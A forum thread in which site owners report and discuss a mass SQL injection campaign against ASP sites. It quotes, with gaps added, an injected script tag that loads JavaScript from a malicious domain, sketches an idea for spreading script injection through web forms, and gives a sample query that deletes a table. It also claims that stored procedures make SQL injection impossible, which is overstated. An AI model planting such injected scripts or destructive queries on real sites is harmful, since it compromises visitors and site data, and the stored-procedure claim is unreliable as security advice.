WARNING !! Virus Again

[Granada]

Just found we've been hit by a similar virus to the one a few weeks ago, but this one has wiped out most of our site this time.

I've putting gaps in between the script

<s cript src = 'http: // winzipices.cn /3.js' ></ script >

[John Jupp]

I see they're not just going after travel sites. A review site of Hannah Montana merchandise has been taken over and that'll have a profound impact.

[Granada]

Update.

Seems to happen on a bank holiday. (Last one Easter Monday)
See this as well
ITPro: News: Microsoft denies fault for massive SQL attack

[trevHCS]

Seems there's a lot of ASP sites out there with problems, although whether it's that easy to defend against this I'm not at all sure. Seems some of it is generally faults in MSSQL, SQL injections and unchecked input going into text fields...but, due to the way it injects that's not the simplest thing to block.

Maybe your best plan is to remove any forms from the site, or seriously restrict the length of the input although i have seen examples of this in GET strings too. Not sure how they've worked.

Regarding the Microsoft thing - isn't it a bit odd that it only hit ASP sites if it's not using a fault in ASP? I've read reports that it's bypassing the security systems which should prevent it writing to the dbase due to not having the full permissions, but don't know enough about MSSQL to check that. Also the fact that it can inject via GET strings is very odd, unless ASP has something similar to the PHP register_globals turned on by default.


Sidenote:

The best idea I'd have thought for them would be simply inject <script s_c="xxx.js"> into any web forms like the spammers do with URLs. There's a chance it'll get outputted straight into a guestbook, or will get emailed to someone with OE and thus infect them that way. Then you simply sit back and watch all these random users infect more web sites as they come across forms.

Doesn't require any specific ASP or similar problems and ok won't work everywhere, but might be surprising where it will work.

Trev

[zijiji]

I'm just responding to this from a technical perspective. The fact that its hit a lot of ASP sites is irrelevant as its the underlying program code from the web developer thats caused a problem.

From the link at [url=http://www.itpro.co.uk/news/192510/microsoft-denies-fault-for-massive-sql-attack.html]ITPro: News: Microsoft denies fault for massive SQL attack</url] it says:

[quote]It was claimed that attackers created an automated attack which took advantage of SQL injection vulnerabilities in web pages which did not follow security best practices for web application development[quote]

ASP was good 10 or so years ago for getting some kind of web presence, but it led to extremely bad program code when amateur Tom, Dick and Harry jumped on the internet bandwagon.

The SQL Injection vunerability comes from the web developers accessing the database direct using syntax such as "SELECT * FROM [orders] WHERE OrderNumber = 1000 " type syntax.

As the database was often MS Access, and somes MySQL or even MS SQL Server, these direct database calls can using SQL Injection be changed to something like:

SELECT * FROM [orders] WHERE OrderNumber = 1000 DELETE * FROM [orders]

- resulting in all orders being deleted - or something more malicious (exact syntax not shown, but you get the gist of it). For the best practice for database manipulation, you should not use any direct SELECT, UPDATE, INSERT or DELETE SQL commands, but instead used stored procedures instead.

Each stored procedure is permissioned to allow only specific user(s) to execute it and with stored procedures it is not possible to be affected by SQL injection attacks.

SQL injection can affect all databases and code platforms from Perl to PHP to .NET and from MS Access to SQL Server to Oracle and beyond. Its the web developer(s) who are fault for writing unsecure code.

Even with ASP, its possible to write a very secure application - although you'd need to write a lot of code to validate any entered data etc...

You could always move to ASP.NET which gives you a lot of flexibility, faster code development etc.

Or, if you want to PM me, I'm available for consultancy!

On a side note, some of the sites I've developed have automated SQL injection attempts at a rate of thousands a day - with no success. They happen 24x7 without you even noticing - unless an inexperienced webdeveloper did your website and you get hit!